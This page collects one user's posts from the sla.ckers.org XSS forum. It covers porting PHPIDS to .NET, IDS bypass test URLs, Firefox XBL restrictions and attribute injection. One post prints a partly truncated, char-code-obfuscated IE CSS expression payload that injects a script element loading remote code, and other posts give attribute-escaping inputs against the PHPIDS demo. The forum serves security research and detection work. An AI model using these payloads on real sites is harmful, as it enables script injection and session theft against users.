sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 3
Results 1 - 30 of 90
6 years ago
Martin
Heya. Finally getting some time and resurrecting the .NETIDS, which was having severe memory consumption issues in its last build :/ Anyway, found a bug in one of the Regex expressions in convertFromJSCharcode:
if (preg_match_all('/\d*[+-\/\* ]\d+/', $char, $matches)) {
This should match optional digits, + or - or / or * or \s, and then digits. It actually matches optional digits, a
Forum: Projects
7 years ago
Martin
Awesome vector - amazing work!
Forum: Projects
7 years ago
Martin
Just a quick note about .NETIDS which I really want to share! There is now support on the SmokeTest for detection of fragmented XSS attacks! I posted full details at http://the-mice.co.uk/switch/index.php/archives/27 but a basic example can be found at: http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=Hello%20&param2=this%20&param3=is%20a%20test! and http://www.the-m
Forum: Projects
7 years ago
Martin
I've done the initial work on a port to .NET (C#). Work is at http://code.google.com/p/dotnetids/
Missing:
- Complete XMLDOC comments
- Some IEnumerable implementations
Still, it works, here's a test page using it:
IDS.IDS ids = new IDS.IDS(Request.QueryString);
ids.Run();
Label1.Text = "Total Impact: " + ids.Report.Impact.ToString();
Forum: Projects
7 years ago
Martin
@.mario - I tried http://phpids.heideri.ch/?test=/../thisfile and it triggered no warnings that this was dangerous input... is that what you meant?
Forum: Projects
7 years ago
Martin
What about detecting directory traversals (../) which could be useful when trying to avoid LFI vulnerabilities?
Forum: Projects
7 years ago
Martin
@.mario - firstly, I apologise for those !!!!s after the URL - they were meant to be part of it hehe. I agree that catching > will generate too many false positives. Maybe this is one that will just have to be let go - I mean you can write a new attribute simply by putting a space after some text in the a href no quotes.
Forum: Projects
7 years ago
Martin
@.mario - it's still escapable via http://phpids.heideri.ch/?test=%3Etest%3C/a%3E%20ESCAPED%20AGAIN!!!! I'm not sure how this can be detected really, unless you disallow >, but this is essentially allowing a malicious individual to write their content onto the page - ie. could forge a link to "login".
Forum: Projects
7 years ago
Martin
http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22 I don't know if this counts or not - it escapes the a href no quotes - which is definitely malicious input although not of a high severity.
Forum: Projects
7 years ago
Martin
@Hong: which browser does that work in? I can't replicate in FF or IE7...
Forum: Projects
6 years ago
Martin
Nice concept - been thinking about that for a while. What about expanding it to attempt to locate pre-existing segments of the web. This would mean breaking down the segments much further, and you'd need to somehow CRC the segment, but it would mean that technically the data couldn't be taken down, because it would be truly distributed and all parts of the content hosted by different people.
Forum: Projects
6 years ago
Martin
I agree that NoScript's protection against XBL binding is ace and I in no way meant to detract from this; took me ages to work out why a binding wasn't working and it was good old NoScript doing its job! On the other hand, while the in-line feature is documented, the blocking of cross-domain XBL loading is not so easy to find out about. As I pointed out, one obliterates the security impact of t
Forum: XSS Info
6 years ago
Martin
Hey all, Don't know if anyone has already looked at this (I found a passing reference by Giorgio at http://hackademix.net/2007/12/25/merry-xssmas/ ), and apologies if they have and I'm duplicating it, but FF3 disallows cross-site XBL requests, so no more off-site -moz-binding commands. However, in their infinite wisdom, the moz devs have decided that allowing inline XBL is ok. Go figure.
Forum: XSS Info
6 years ago
Martin
Indeed, what riahmatic says is right. The only context where this is useful is when an image is being loaded in some form of execution context. E.g. <script src="exploit.gif" /> In this case, the contents of exploit.gif are evaluated as javascript. In the scenario you are describing, the image is being evaluated as an image. Not as a script of any kind, the valid heade
Forum: XSS Info
6 years ago
Martin
document.cookie not document.cookies ?
Forum: XSS Info
6 years ago
Martin
You know about attribute injection right? Occurs when a site echoes back user supplied input into a tag's attributes. If you can escape the attribute you can attach a style tag that takes malicious action.
Forum: XSS Info
6 years ago
Martin
If you can't escape the attribute then obviously you can't screw up the tag. If quotes are encoded then I'd assume that others will be suitably handled as well...
Forum: XSS Info
6 years ago
Martin
@Gareth: I see your point, but I still think it's not clear cut; as I stated, in any exploit the payload ultimately becomes "local" :)
Forum: XSS Info
6 years ago
Martin
Because attributes are normally (except in insane cases) set on Controls' properties rather than by outputting directly to the page they automatically go through the correct encoding methods.
Forum: XSS Info
6 years ago
Martin
"It's always local because it's executed on the client." If I may present a dissenting opinion :P In terms of what is vulnerable:
- the web browser is operating as expected, parsing a web page
- the web application is serving different content than intended based upon malicious remote input
It is therefore the structure of the web page, via the web application, that is vulnera
Forum: XSS Info
6 years ago
Martin
It could be that the site will only recognise cookies that come from the same IP address as the originator. Alternatively there could be an HttpOnly cookie hidden that you are not receiving.
Forum: CSRF and Session Info
6 years ago
Martin
I suspect this will be handled on the server side... so no. If you can inject some javascript you could replace the time and date, but if you can inject javascript that would not be the first thing I would do.
Forum: Projects
6 years ago
Martin
@DoctorDan My apologies also - it's such a good tip that I saved it at the time and then completely forgot where it came from!
Forum: XSS Info
6 years ago
Martin
You can actually bind to anything:expression() - I normally use xx:expression The trick for multiple statements is to use an eval: style=”xx: expression((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,ETC));document.getElementById(x(99,104,101,109,45,110,97,118,45,102,111,114,117,1
Forum: XSS Info
6 years ago
Martin
Glad you liked it Gareth :) The main problem was getting IE to not go into its stupid bloody loop, which the window.r trick nicely avoids. Also really nice work integrating that into Hackvertor - really useful as my patience with encoding things manually is fast wearing thin!
Forum: XSS Info
7 years ago
Martin
Mephisto: They might have disabled RequestValidation - he did say weak applications!
Forum: XSS Info
7 years ago
Martin
Either that or the cookies are HttpOnly...
Forum: XSS Info
7 years ago
Martin
Ronald: haven't you checked out #websechotties on freenode - it's just about the largest channel on there! Welcome FOLD :)
Forum: Intro
7 years ago
Martin
29. Re: IRC
/me joins the party
Forum: OMG Ponies
7 years ago
Martin
30. IRC
Don't know if this has been raised before, but is there any possibility of a slackers irc channel? If one can't be set up on the web server then what about something like ##websec on freenode (not currently in existence)? Martin
Forum: OMG Ponies